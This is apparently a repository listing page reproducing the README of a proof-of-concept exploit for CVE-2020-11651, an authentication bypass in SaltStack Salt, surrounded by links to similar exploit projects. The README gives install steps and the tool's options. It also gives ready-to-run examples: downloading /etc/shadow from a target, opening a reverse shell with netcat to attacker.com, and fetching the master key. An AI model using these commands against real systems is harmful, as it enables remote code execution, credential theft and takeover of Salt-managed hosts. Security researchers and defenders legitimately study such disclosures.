All Projects → 0xc0d → CVE-2020-11651

0xc0d / CVE-2020-11651

Licence: other
CVE-2020-11651: Proof of Concept

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to CVE-2020-11651

Ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Stars: ✭ 4,808 (+11626.83%)
Mutual labels:  poc, vulnerability
Cve 2020 10199 cve 2020 10204
CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面。CVE-2020-10199 and CVE-2020-10204 Vul Tool with GUI.
Stars: ✭ 20 (-51.22%)
Mutual labels:  poc, vulnerability
Poc
Proofs-of-concept
Stars: ✭ 467 (+1039.02%)
Mutual labels:  poc, vulnerability
NSE-scripts
NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473
Stars: ✭ 105 (+156.1%)
Mutual labels:  poc, vulnerability
Exphub
Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340
Stars: ✭ 3,056 (+7353.66%)
Mutual labels:  poc, vulnerability
Javadeserh2hc
Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).
Stars: ✭ 361 (+780.49%)
Mutual labels:  poc, vulnerability
Xray
一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档
Stars: ✭ 6,218 (+15065.85%)
Mutual labels:  poc, vulnerability
Vulscan
vulscan 扫描系统:最新的poc&exp漏洞扫描,redis未授权、敏感文件、java反序列化、tomcat命令执行及各种未授权扫描等...
Stars: ✭ 486 (+1085.37%)
Mutual labels:  poc, vulnerability
Pub
Vulnerability Notes, PoC Exploits and Write-Ups for security issues disclosed by tintinweb
Stars: ✭ 217 (+429.27%)
Mutual labels:  poc, vulnerability
Bitp0wn
Algorithms to re-compute a private key, to fake signatures and some other funny things with Bitcoin.
Stars: ✭ 59 (+43.9%)
Mutual labels:  poc, vulnerability
Pentesting
Misc. Public Reports of Penetration Testing and Security Audits.
Stars: ✭ 24 (-41.46%)
Mutual labels:  poc, vulnerability
Ary
Ary 是一个集成类工具,主要用于调用各种安全工具,从而形成便捷的一键式渗透。
Stars: ✭ 241 (+487.8%)
Mutual labels:  poc, vulnerability
CVE-2021-33766
ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit
Stars: ✭ 37 (-9.76%)
Mutual labels:  poc, vulnerability
Hacking
hacker, ready for more of our story ! 🚀
Stars: ✭ 413 (+907.32%)
Mutual labels:  poc, vulnerability
CVE-2020-1611
Juniper Junos Space (CVE-2020-1611) (PoC)
Stars: ✭ 25 (-39.02%)
Mutual labels:  poc, vulnerability
Poccollect
Poc Collected for study and develop
Stars: ✭ 15 (-63.41%)
Mutual labels:  poc, vulnerability
Php7 Opcache Override
Security-related PHP7 OPcache abuse tools and demo
Stars: ✭ 237 (+478.05%)
Mutual labels:  poc, vulnerability
dheater
D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the Diffie-Hellman key exchange.
Stars: ✭ 142 (+246.34%)
Mutual labels:  poc, vulnerability
vulnscan
A static binary vulnerability scanner
Stars: ✭ 47 (+14.63%)
Mutual labels:  vulnerability
exploits
Some of my public exploits
Stars: ✭ 50 (+21.95%)
Mutual labels:  vulnerability

CVE-2020-11651

An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.

Details

Patches for unspported salt versions

Install

git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

Usage

$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        Command to execute. Defaul: /bin/sh (use netcat for reverse shell)
  --upload src dest, -u src dest
                        Upload a file
  --download src dest, -d src dest
                        Download a file
  --minions             Send command to all minions on master
  --quiet, -q           Enable quiet/silent mode
  --fetch-key-only      Only fetch the key

Example

Download shadow file

./PoC.py --host target.com --download /etc/shadow ./shadow

Run a reverse shell

nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""

Fetch the key

./PoC.py --host target.com --fetch-key-only
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].